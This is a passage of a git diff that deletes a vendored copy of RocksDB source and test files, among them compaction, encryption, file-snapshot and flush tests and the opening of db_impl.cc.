-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "CompactionJob::Run():Start",
-      [&](void* arg) { env_->SleepForMicroseconds(100000); });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  ASSERT_OK(dbfull()->SetOptions({
-      {"disable_auto_compactions", "true"},
-  }));
-  // Write about 40K more
-  for (int i = 0; i < 100; i++) {
-    ASSERT_OK(Put(Key(static_cast<int>(rnd.Uniform(kMaxKey))),
-                  RandomString(&rnd, 380)));
-  }
-  ASSERT_OK(dbfull()->SetOptions({
-      {"disable_auto_compactions", "false"},
-  }));
-  Flush();
-  // Wait for 200 milliseconds before proceeding compactions to make sure two
-  // parallel ones are executed.
-  env_->SleepForMicroseconds(200000);
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_TRUE(db_->GetIntProperty("rocksdb.base-level", &int_prop));
-  ASSERT_EQ(3U, int_prop);
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  // Trigger a condition that the compaction changes base level and L0->Lbase
-  // happens at the same time.
-  // We try to make last levels' targets to be 40K, 160K, 640K, add triggers
-  // another compaction from 40K->160K.
-  ASSERT_OK(dbfull()->SetOptions({
-      {"disable_auto_compactions", "true"},
-  }));
-  // Write about 650K more.
-  // Each file is about 11KB, with 9KB of data.
-  for (int i = 0; i < 1300; i++) {
-    ASSERT_OK(Put(Key(static_cast<int>(rnd.Uniform(kMaxKey))),
-                  RandomString(&rnd, 380)));
-  }
-  ASSERT_OK(dbfull()->SetOptions({
-      {"disable_auto_compactions", "false"},
-  }));
-  Flush();
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_TRUE(db_->GetIntProperty("rocksdb.base-level", &int_prop));
-  ASSERT_EQ(2U, int_prop);
-
-  // A manual compaction will trigger the base level to become L2
-  // Keep Writing data until base level changed 2->1. There will be L0->L2
-  // compaction going on at the same time.
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"CompactionJob::Run():Start", "DynamicLevelMaxBytesBase2:0"},
-      {"DynamicLevelMaxBytesBase2:1", "CompactionJob::Run():End"},
-      {"DynamicLevelMaxBytesBase2:compact_range_finish",
-       "FlushJob::WriteLevel0Table"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rocksdb::port::Thread thread([this] {
-    TEST_SYNC_POINT("DynamicLevelMaxBytesBase2:compact_range_start");
-    ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-    TEST_SYNC_POINT("DynamicLevelMaxBytesBase2:compact_range_finish");
-  });
-
-  TEST_SYNC_POINT("DynamicLevelMaxBytesBase2:0");
-  for (int i = 0; i < 2; i++) {
-    ASSERT_OK(Put(Key(static_cast<int>(rnd.Uniform(kMaxKey))),
-                  RandomString(&rnd, 380)));
-  }
-  TEST_SYNC_POINT("DynamicLevelMaxBytesBase2:1");
-
-  Flush();
-
-  thread.join();
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-
-  ASSERT_TRUE(db_->GetIntProperty("rocksdb.base-level", &int_prop));
-  ASSERT_EQ(1U, int_prop);
-}
-
-// Test specific cases in dynamic max bytes
-TEST_F(DBTestDynamicLevel, DynamicLevelMaxBytesCompactRange) {
-  Random rnd(301);
-  int kMaxKey = 1000000;
-
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.write_buffer_size = 2048;
-  options.max_write_buffer_number = 2;
-  options.level0_file_num_compaction_trigger = 2;
-  options.level0_slowdown_writes_trigger = 9999;
-  options.level0_stop_writes_trigger = 9999;
-  options.target_file_size_base = 2;
-  options.level_compaction_dynamic_level_bytes = true;
-  options.max_bytes_for_level_base = 10240;
-  options.max_bytes_for_level_multiplier = 4;
-  options.max_background_compactions = 1;
-  const int kNumLevels = 5;
-  options.num_levels = kNumLevels;
-  options.max_compaction_bytes = 1;  // Force not expanding in compactions
-  BlockBasedTableOptions table_options;
-  table_options.block_size = 1024;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  DestroyAndReopen(options);
-
-  // Compact against empty DB
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-
-  uint64_t int_prop;
-  std::string str_prop;
-
-  // Initial base level is the last level
-  ASSERT_TRUE(db_->GetIntProperty("rocksdb.base-level", &int_prop));
-  ASSERT_EQ(4U, int_prop);
-
-  // Put about 7K to L0
-  for (int i = 0; i < 140; i++) {
-    ASSERT_OK(Put(Key(static_cast<int>(rnd.Uniform(kMaxKey))),
-                  RandomString(&rnd, 80)));
-  }
-  Flush();
-  dbfull()->TEST_WaitForCompact();
-  if (NumTableFilesAtLevel(0) == 0) {
-    // Make sure level 0 is not empty
-    ASSERT_OK(Put(Key(static_cast<int>(rnd.Uniform(kMaxKey))),
-                  RandomString(&rnd, 80)));
-    Flush();
-  }
-
-  ASSERT_TRUE(db_->GetIntProperty("rocksdb.base-level", &int_prop));
-  ASSERT_EQ(3U, int_prop);
-  ASSERT_TRUE(db_->GetProperty("rocksdb.num-files-at-level1", &str_prop));
-  ASSERT_EQ("0", str_prop);
-  ASSERT_TRUE(db_->GetProperty("rocksdb.num-files-at-level2", &str_prop));
-  ASSERT_EQ("0", str_prop);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-
-  std::set<int> output_levels;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "CompactionPicker::CompactRange:Return", [&](void* arg) {
-        Compaction* compaction = reinterpret_cast<Compaction*>(arg);
-        output_levels.insert(compaction->output_level());
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ(output_levels.size(), 2);
-  ASSERT_TRUE(output_levels.find(3) != output_levels.end());
-  ASSERT_TRUE(output_levels.find(4) != output_levels.end());
-  ASSERT_TRUE(db_->GetProperty("rocksdb.num-files-at-level0", &str_prop));
-  ASSERT_EQ("0", str_prop);
-  ASSERT_TRUE(db_->GetProperty("rocksdb.num-files-at-level3", &str_prop));
-  ASSERT_EQ("0", str_prop);
-  // Base level is still level 3.
-  ASSERT_TRUE(db_->GetIntProperty("rocksdb.base-level", &int_prop));
-  ASSERT_EQ(3U, int_prop);
-}
-
-TEST_F(DBTestDynamicLevel, DynamicLevelMaxBytesBaseInc) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.write_buffer_size = 2048;
-  options.max_write_buffer_number = 2;
-  options.level0_file_num_compaction_trigger = 2;
-  options.level0_slowdown_writes_trigger = 2;
-  options.level0_stop_writes_trigger = 2;
-  options.target_file_size_base = 2048;
-  options.level_compaction_dynamic_level_bytes = true;
-  options.max_bytes_for_level_base = 10240;
-  options.max_bytes_for_level_multiplier = 4;
-  options.soft_rate_limit = 1.1;
-  options.max_background_compactions = 2;
-  options.num_levels = 5;
-  options.max_compaction_bytes = 100000000;
-
-  DestroyAndReopen(options);
-
-  int non_trivial = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial",
-      [&](void* arg) { non_trivial++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Random rnd(301);
-  const int total_keys = 3000;
-  const int random_part_size = 100;
-  for (int i = 0; i < total_keys; i++) {
-    std::string value = RandomString(&rnd, random_part_size);
-    PutFixed32(&value, static_cast<uint32_t>(i));
-    ASSERT_OK(Put(Key(i), value));
-  }
-  Flush();
-  dbfull()->TEST_WaitForCompact();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  ASSERT_EQ(non_trivial, 0);
-
-  for (int i = 0; i < total_keys; i++) {
-    std::string value = Get(Key(i));
-    ASSERT_EQ(DecodeFixed32(value.c_str() + random_part_size),
-              static_cast<uint32_t>(i));
-  }
-
-  env_->SetBackgroundThreads(1, Env::LOW);
-  env_->SetBackgroundThreads(1, Env::HIGH);
-}
-
-TEST_F(DBTestDynamicLevel, DISABLED_MigrateToDynamicLevelMaxBytesBase) {
-  Random rnd(301);
-  const int kMaxKey = 2000;
-
-  Options options;
-  options.create_if_missing = true;
-  options.write_buffer_size = 2048;
-  options.max_write_buffer_number = 8;
-  options.level0_file_num_compaction_trigger = 4;
-  options.level0_slowdown_writes_trigger = 4;
-  options.level0_stop_writes_trigger = 8;
-  options.target_file_size_base = 2048;
-  options.level_compaction_dynamic_level_bytes = false;
-  options.max_bytes_for_level_base = 10240;
-  options.max_bytes_for_level_multiplier = 4;
-  options.soft_rate_limit = 1.1;
-  options.num_levels = 8;
-
-  DestroyAndReopen(options);
-
-  auto verify_func = [&](int num_keys, bool if_sleep) {
-    for (int i = 0; i < num_keys; i++) {
-      ASSERT_NE("NOT_FOUND", Get(Key(kMaxKey + i)));
-      if (i < num_keys / 10) {
-        ASSERT_EQ("NOT_FOUND", Get(Key(i)));
-      } else {
-        ASSERT_NE("NOT_FOUND", Get(Key(i)));
-      }
-      if (if_sleep && i % 1000 == 0) {
-        // Without it, valgrind may choose not to give another
-        // thread a chance to run before finishing the function,
-        // causing the test to be extremely slow.
-        env_->SleepForMicroseconds(1);
-      }
-    }
-  };
-
-  int total_keys = 1000;
-  for (int i = 0; i < total_keys; i++) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 102)));
-    ASSERT_OK(Put(Key(kMaxKey + i), RandomString(&rnd, 102)));
-    ASSERT_OK(Delete(Key(i / 10)));
-  }
-  verify_func(total_keys, false);
-  dbfull()->TEST_WaitForCompact();
-
-  options.level_compaction_dynamic_level_bytes = true;
-  options.disable_auto_compactions = true;
-  Reopen(options);
-  verify_func(total_keys, false);
-
-  std::atomic_bool compaction_finished;
-  compaction_finished = false;
-  // Issue manual compaction in one thread and still verify DB state
-  // in main thread.
-  rocksdb::port::Thread t([&]() {
-    CompactRangeOptions compact_options;
-    compact_options.change_level = true;
-    compact_options.target_level = options.num_levels - 1;
-    dbfull()->CompactRange(compact_options, nullptr, nullptr);
-    compaction_finished.store(true);
-  });
-  do {
-    verify_func(total_keys, true);
-  } while (!compaction_finished.load());
-  t.join();
-
-  ASSERT_OK(dbfull()->SetOptions({
-      {"disable_auto_compactions", "false"},
-  }));
-
-  int total_keys2 = 2000;
-  for (int i = total_keys; i < total_keys2; i++) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 102)));
-    ASSERT_OK(Put(Key(kMaxKey + i), RandomString(&rnd, 102)));
-    ASSERT_OK(Delete(Key(i / 10)));
-  }
-
-  verify_func(total_keys2, false);
-  dbfull()->TEST_WaitForCompact();
-  verify_func(total_keys2, false);
-
-  // Base level is not level 1
-  ASSERT_EQ(NumTableFilesAtLevel(1), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(2), 0);
-}
-}  // namespace rocksdb
-
-#endif  // !defined(ROCKSDB_LITE)
-
-int main(int argc, char** argv) {
-#if !defined(ROCKSDB_LITE)
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-#else
-  return 0;
-#endif
-}
diff --git a/thirdparty/rocksdb/db/db_encryption_test.cc b/thirdparty/rocksdb/db/db_encryption_test.cc
deleted file mode 100644
index 38eee56..0000000
--- a/thirdparty/rocksdb/db/db_encryption_test.cc
+++ /dev/null
@@ -1,94 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-#include "rocksdb/perf_context.h"
-#if !defined(ROCKSDB_LITE)
-#include "util/sync_point.h"
-#endif
-#include <iostream>
-#include <string>
-
-namespace rocksdb {
-
-class DBEncryptionTest : public DBTestBase {
- public:
-  DBEncryptionTest() : DBTestBase("/db_encryption_test") {}
-};
-
-#ifndef ROCKSDB_LITE
-
-TEST_F(DBEncryptionTest, CheckEncrypted) {
-  ASSERT_OK(Put("foo567", "v1.fetdq"));
-  ASSERT_OK(Put("bar123", "v2.dfgkjdfghsd"));
-  Close();
-
-  // Open all files and look for the values we've put in there.
-  // They should not be found if encrypted, otherwise
-  // they should be found.
-  std::vector<std::string> fileNames;
-  auto status = env_->GetChildren(dbname_, &fileNames);
-  ASSERT_OK(status);
-
-  auto defaultEnv = Env::Default();
-  int hits = 0;
-  for (auto it = fileNames.begin() ; it != fileNames.end(); ++it) {
-    if ((*it == "..") || (*it == ".")) {
-      continue;
-    }
-    auto filePath = dbname_ + "/" + *it;
-    unique_ptr<SequentialFile> seqFile;
-    auto envOptions = EnvOptions(CurrentOptions());
-    status = defaultEnv->NewSequentialFile(filePath, &seqFile, envOptions);
-    ASSERT_OK(status);
-
-    uint64_t fileSize;
-    status = defaultEnv->GetFileSize(filePath, &fileSize);
-    ASSERT_OK(status);
-
-    std::string scratch;
-    scratch.reserve(fileSize);
-    Slice data;
-    status = seqFile->Read(fileSize, &data, (char*)scratch.data());
-    ASSERT_OK(status);
-
-    if (data.ToString().find("foo567") != std::string::npos) {
-      hits++; 
-      //std::cout << "Hit in " << filePath << "\n";
-    }
-    if (data.ToString().find("v1.fetdq") != std::string::npos) {
-      hits++; 
-      //std::cout << "Hit in " << filePath << "\n";
-    }
-    if (data.ToString().find("bar123") != std::string::npos) {
-      hits++; 
-      //std::cout << "Hit in " << filePath << "\n";
-    }
-    if (data.ToString().find("v2.dfgkjdfghsd") != std::string::npos) {
-      hits++; 
-      //std::cout << "Hit in " << filePath << "\n";
-    }
-    if (data.ToString().find("dfgk") != std::string::npos) {
-      hits++; 
-      //std::cout << "Hit in " << filePath << "\n";
-    }
-  }
-  if (encrypted_env_) {
-    ASSERT_EQ(hits, 0);
-  } else {
-    ASSERT_GE(hits, 4);
-  }
-}
-
-#endif // ROCKSDB_LITE
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_filesnapshot.cc b/thirdparty/rocksdb/db/db_filesnapshot.cc
deleted file mode 100644
index e266bf1..0000000
--- a/thirdparty/rocksdb/db/db_filesnapshot.cc
+++ /dev/null
@@ -1,149 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <stdint.h>
-#include <algorithm>
-#include <string>
-#include "db/db_impl.h"
-#include "db/job_context.h"
-#include "db/version_set.h"
-#include "port/port.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "util/file_util.h"
-#include "util/filename.h"
-#include "util/mutexlock.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-Status DBImpl::DisableFileDeletions() {
-  InstrumentedMutexLock l(&mutex_);
-  ++disable_delete_obsolete_files_;
-  if (disable_delete_obsolete_files_ == 1) {
-    ROCKS_LOG_INFO(immutable_db_options_.info_log, "File Deletions Disabled");
-  } else {
-    ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                   "File Deletions Disabled, but already disabled. Counter: %d",
-                   disable_delete_obsolete_files_);
-  }
-  return Status::OK();
-}
-
-Status DBImpl::EnableFileDeletions(bool force) {
-  // Job id == 0 means that this is not our background process, but rather
-  // user thread
-  JobContext job_context(0);
-  bool should_purge_files = false;
-  {
-    InstrumentedMutexLock l(&mutex_);
-    if (force) {
-      // if force, we need to enable file deletions right away
-      disable_delete_obsolete_files_ = 0;
-    } else if (disable_delete_obsolete_files_ > 0) {
-      --disable_delete_obsolete_files_;
-    }
-    if (disable_delete_obsolete_files_ == 0)  {
-      ROCKS_LOG_INFO(immutable_db_options_.info_log, "File Deletions Enabled");
-      should_purge_files = true;
-      FindObsoleteFiles(&job_context, true);
-    } else {
-      ROCKS_LOG_WARN(
-          immutable_db_options_.info_log,
-          "File Deletions Enable, but not really enabled. Counter: %d",
-          disable_delete_obsolete_files_);
-    }
-  }
-  if (should_purge_files)  {
-    PurgeObsoleteFiles(job_context);
-  }
-  job_context.Clean();
-  LogFlush(immutable_db_options_.info_log);
-  return Status::OK();
-}
-
-int DBImpl::IsFileDeletionsEnabled() const {
-  return disable_delete_obsolete_files_;
-}
-
-Status DBImpl::GetLiveFiles(std::vector<std::string>& ret,
-                            uint64_t* manifest_file_size,
-                            bool flush_memtable) {
-  *manifest_file_size = 0;
-
-  mutex_.Lock();
-
-  if (flush_memtable) {
-    // flush all dirty data to disk.
-    Status status;
-    for (auto cfd : *versions_->GetColumnFamilySet()) {
-      if (cfd->IsDropped()) {
-        continue;
-      }
-      cfd->Ref();
-      mutex_.Unlock();
-      status = FlushMemTable(cfd, FlushOptions());
-      TEST_SYNC_POINT("DBImpl::GetLiveFiles:1");
-      TEST_SYNC_POINT("DBImpl::GetLiveFiles:2");
-      mutex_.Lock();
-      cfd->Unref();
-      if (!status.ok()) {
-        break;
-      }
-    }
-    versions_->GetColumnFamilySet()->FreeDeadColumnFamilies();
-
-    if (!status.ok()) {
-      mutex_.Unlock();
-      ROCKS_LOG_ERROR(immutable_db_options_.info_log, "Cannot Flush data %s\n",
-                      status.ToString().c_str());
-      return status;
-    }
-  }
-
-  // Make a set of all of the live *.sst files
-  std::vector<FileDescriptor> live;
-  for (auto cfd : *versions_->GetColumnFamilySet()) {
-    if (cfd->IsDropped()) {
-      continue;
-    }
-    cfd->current()->AddLiveFiles(&live);
-  }
-
-  ret.clear();
-  ret.reserve(live.size() + 3);  // *.sst + CURRENT + MANIFEST + OPTIONS
-
-  // create names of the live files. The names are not absolute
-  // paths, instead they are relative to dbname_;
-  for (auto live_file : live) {
-    ret.push_back(MakeTableFileName("", live_file.GetNumber()));
-  }
-
-  ret.push_back(CurrentFileName(""));
-  ret.push_back(DescriptorFileName("", versions_->manifest_file_number()));
-  ret.push_back(OptionsFileName("", versions_->options_file_number()));
-
-  // find length of manifest file while holding the mutex lock
-  *manifest_file_size = versions_->manifest_file_size();
-
-  mutex_.Unlock();
-  return Status::OK();
-}
-
-Status DBImpl::GetSortedWalFiles(VectorLogPtr& files) {
-  return wal_manager_.GetSortedWalFiles(files);
-}
-
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/db_flush_test.cc b/thirdparty/rocksdb/db/db_flush_test.cc
deleted file mode 100644
index 107e824..0000000
--- a/thirdparty/rocksdb/db/db_flush_test.cc
+++ /dev/null
@@ -1,162 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-#include "util/fault_injection_test_env.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-class DBFlushTest : public DBTestBase {
- public:
-  DBFlushTest() : DBTestBase("/db_flush_test") {}
-};
-
-class DBFlushDirectIOTest : public DBFlushTest,
-                            public ::testing::WithParamInterface<bool> {
- public:
-  DBFlushDirectIOTest() : DBFlushTest() {}
-};
-
-// We had issue when two background threads trying to flush at the same time,
-// only one of them get committed. The test verifies the issue is fixed.
-TEST_F(DBFlushTest, FlushWhileWritingManifest) {
-  Options options;
-  options.disable_auto_compactions = true;
-  options.max_background_flushes = 2;
-  options.env = env_;
-  Reopen(options);
-  FlushOptions no_wait;
-  no_wait.wait = false;
-
-  SyncPoint::GetInstance()->LoadDependency(
-      {{"VersionSet::LogAndApply:WriteManifest",
-        "DBFlushTest::FlushWhileWritingManifest:1"},
-       {"MemTableList::InstallMemtableFlushResults:InProgress",
-        "VersionSet::LogAndApply:WriteManifestDone"}});
-  SyncPoint::GetInstance()->EnableProcessing();
-
-  ASSERT_OK(Put("foo", "v"));
-  ASSERT_OK(dbfull()->Flush(no_wait));
-  TEST_SYNC_POINT("DBFlushTest::FlushWhileWritingManifest:1");
-  ASSERT_OK(Put("bar", "v"));
-  ASSERT_OK(dbfull()->Flush(no_wait));
-  // If the issue is hit we will wait here forever.
-  dbfull()->TEST_WaitForFlushMemTable();
-#ifndef ROCKSDB_LITE
-  ASSERT_EQ(2, TotalTableFiles());
-#endif  // ROCKSDB_LITE
-}
-
-TEST_F(DBFlushTest, SyncFail) {
-  std::unique_ptr<FaultInjectionTestEnv> fault_injection_env(
-      new FaultInjectionTestEnv(env_));
-  Options options;
-  options.disable_auto_compactions = true;
-  options.env = fault_injection_env.get();
-
-  SyncPoint::GetInstance()->LoadDependency(
-      {{"DBFlushTest::SyncFail:1", "DBImpl::SyncClosedLogs:Start"},
-       {"DBImpl::SyncClosedLogs:Failed", "DBFlushTest::SyncFail:2"}});
-  SyncPoint::GetInstance()->EnableProcessing();
-
-  Reopen(options);
-  Put("key", "value");
-  auto* cfd =
-      reinterpret_cast<ColumnFamilyHandleImpl*>(db_->DefaultColumnFamily())
-          ->cfd();
-  int refs_before = cfd->current()->TEST_refs();
-  FlushOptions flush_options;
-  flush_options.wait = false;
-  ASSERT_OK(dbfull()->Flush(flush_options));
-  fault_injection_env->SetFilesystemActive(false);
-  TEST_SYNC_POINT("DBFlushTest::SyncFail:1");
-  TEST_SYNC_POINT("DBFlushTest::SyncFail:2");
-  fault_injection_env->SetFilesystemActive(true);
-  dbfull()->TEST_WaitForFlushMemTable();
-#ifndef ROCKSDB_LITE
-  ASSERT_EQ("", FilesPerLevel());  // flush failed.
-#endif                             // ROCKSDB_LITE
-  // Flush job should release ref count to current version.
-  ASSERT_EQ(refs_before, cfd->current()->TEST_refs());
-  Destroy(options);
-}
-
-TEST_F(DBFlushTest, FlushInLowPriThreadPool) {
-  // Verify setting an empty high-pri (flush) thread pool causes flushes to be
-  // scheduled in the low-pri (compaction) thread pool.
-  Options options = CurrentOptions();
-  options.level0_file_num_compaction_trigger = 4;
-  options.memtable_factory.reset(new SpecialSkipListFactory(1));
-  Reopen(options);
-  env_->SetBackgroundThreads(0, Env::HIGH);
-
-  std::thread::id tid;
-  int num_flushes = 0, num_compactions = 0;
-  SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BGWorkFlush", [&](void* arg) {
-        if (tid == std::thread::id()) {
-          tid = std::this_thread::get_id();
-        } else {
-          ASSERT_EQ(tid, std::this_thread::get_id());
-        }
-        ++num_flushes;
-      });
-  SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BGWorkCompaction", [&](void* arg) {
-        ASSERT_EQ(tid, std::this_thread::get_id());
-        ++num_compactions;
-      });
-  SyncPoint::GetInstance()->EnableProcessing();
-
-  ASSERT_OK(Put("key", "val"));
-  for (int i = 0; i < 4; ++i) {
-    ASSERT_OK(Put("key", "val"));
-    dbfull()->TEST_WaitForFlushMemTable();
-  }
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ(4, num_flushes);
-  ASSERT_EQ(1, num_compactions);
-}
-
-TEST_P(DBFlushDirectIOTest, DirectIO) {
-  Options options;
-  options.create_if_missing = true;
-  options.disable_auto_compactions = true;
-  options.max_background_flushes = 2;
-  options.use_direct_io_for_flush_and_compaction = GetParam();
-  options.env = new MockEnv(Env::Default());
-  SyncPoint::GetInstance()->SetCallBack(
-      "BuildTable:create_file", [&](void* arg) {
-        bool* use_direct_writes = static_cast<bool*>(arg);
-        ASSERT_EQ(*use_direct_writes,
-                  options.use_direct_io_for_flush_and_compaction);
-      });
-
-  SyncPoint::GetInstance()->EnableProcessing();
-  Reopen(options);
-  ASSERT_OK(Put("foo", "v"));
-  FlushOptions flush_options;
-  flush_options.wait = true;
-  ASSERT_OK(dbfull()->Flush(flush_options));
-  Destroy(options);
-  delete options.env;
-}
-
-INSTANTIATE_TEST_CASE_P(DBFlushDirectIOTest, DBFlushDirectIOTest,
-                        testing::Bool());
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_impl.cc b/thirdparty/rocksdb/db/db_impl.cc
deleted file mode 100644
index d1bfe41..0000000
--- a/thirdparty/rocksdb/db/db_impl.cc
+++ /dev/null
@@ -1,2823 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include "db/db_impl.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-#include <inttypes.h>
-#include <stdint.h>
-#ifdef OS_SOLARIS
-#include <alloca.h>
-#endif
-
-#include <algorithm>
-#include <climits>
-#include <cstdio>
-#include <map>
-#include <set>
-#include <stdexcept>
-#include <string>
-#include <unordered_map>
-#include <unordered_set>
-#include <utility>
-#include <vector>
-
-#include "db/builder.h"
-#include "db/compaction_job.h"
-#include "db/db_info_dumper.h"
-#include "db/db_iter.h"
-#include "db/dbformat.h"
-#include "db/event_helpers.h"
-#include "db/external_sst_file_ingestion_job.h"
-#include "db/flush_job.h"
-#include "db/forward_iterator.h"
-#include "db/job_context.h"
-#include "db/log_reader.h"
-#include "db/log_writer.h"
-#include "db/malloc_stats.h"
-#include "db/managed_iterator.h"
-#include "db/memtable.h"
-#include "db/memtable_list.h"
-#include "db/merge_context.h"
-#include "db/merge_helper.h"
-#include "db/range_del_aggregator.h"
-#include "db/table_cache.h"
-#include "db/table_properties_collector.h"
-#include "db/transaction_log_impl.h"
-#include "db/version_set.h"
-#include "db/write_batch_internal.h"
-#include "db/write_callback.h"
-#include "memtable/hash_linklist_rep.h"
-#include "memtable/hash_skiplist_rep.h"
-#include "monitoring/iostats_context_imp.h"
-#include "monitoring/perf_context_imp.h"
-#include "monitoring/thread_status_updater.h"
-#include "monitoring/thread_status_util.h"
-#include "options/cf_options.h"
-#include "options/options_helper.h"
-#include "options/options_parser.h"
-#include "port/likely.h"
-#include "port/port.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/status.h"
-#include "rocksdb/table.h"
-#include "rocksdb/version.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "table/block.h"
-#include "table/block_based_table_factory.h"
-#include "table/merging_iterator.h"
-#include "table/table_builder.h"
-#include "table/two_level_iterator.h"
-#include "tools/sst_dump_tool_imp.h"
-#include "util/auto_roll_logger.h"
-#include "util/autovector.h"
-#include "util/build_version.h"
-#include "util/coding.h"
-#include "util/compression.h"
-#include "util/crc32c.h"
-#include "util/file_reader_writer.h"
-#include "util/file_util.h"
-#include "util/filename.h"
-#include "util/log_buffer.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/sst_file_manager_impl.h"
-#include "util/stop_watch.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-const std::string kDefaultColumnFamilyName("default");
-void DumpRocksDBBuildVersion(Logger * log);
-
-CompressionType GetCompressionFlush(
-    const ImmutableCFOptions& ioptions,
-    const MutableCFOptions& mutable_cf_options) {
-  // Compressing memtable flushes might not help unless the sequential load
-  // optimization is used for leveled compaction. Otherwise the CPU and
-  // latency overhead is not offset by saving much space.
-  if (ioptions.compaction_style == kCompactionStyleUniversal) {
-    if (ioptions.compaction_options_universal.compression_size_percent < 0) {
-      return mutable_cf_options.compression;
-    } else {
-      return kNoCompression;
-    }
-  } else if (!ioptions.compression_per_level.empty()) {
-    // For leveled compress when min_level_to_compress != 0.
-    return ioptions.compression_per_level[0];
-  } else {
-    return mutable_cf_options.compression;
-  }
-}
-
-namespace {
-void DumpSupportInfo(Logger* logger) {
-  ROCKS_LOG_HEADER(logger, "Compression algorithms supported:");
-  ROCKS_LOG_HEADER(logger, "\tSnappy supported: %d", Snappy_Supported());
-  ROCKS_LOG_HEADER(logger, "\tZlib supported: %d", Zlib_Supported());
-  ROCKS_LOG_HEADER(logger, "\tBzip supported: %d", BZip2_Supported());
-  ROCKS_LOG_HEADER(logger, "\tLZ4 supported: %d", LZ4_Supported());
-  ROCKS_LOG_HEADER(logger, "\tZSTD supported: %d", ZSTD_Supported());
-  ROCKS_LOG_HEADER(logger, "Fast CRC32 supported: %d",
-                   crc32c::IsFastCrc32Supported());
-}
-
-int64_t kDefaultLowPriThrottledRate = 2 * 1024 * 1024;
-} // namespace
-
-DBImpl::DBImpl(const DBOptions& options, const std::string& dbname)
-    : env_(options.env),
-      dbname_(dbname),
-      initial_db_options_(SanitizeOptions(dbname, options)),
-      immutable_db_options_(initial_db_options_),
-      mutable_db_options_(initial_db_options_),
-      stats_(immutable_db_options_.statistics.get()),
-      db_lock_(nullptr),
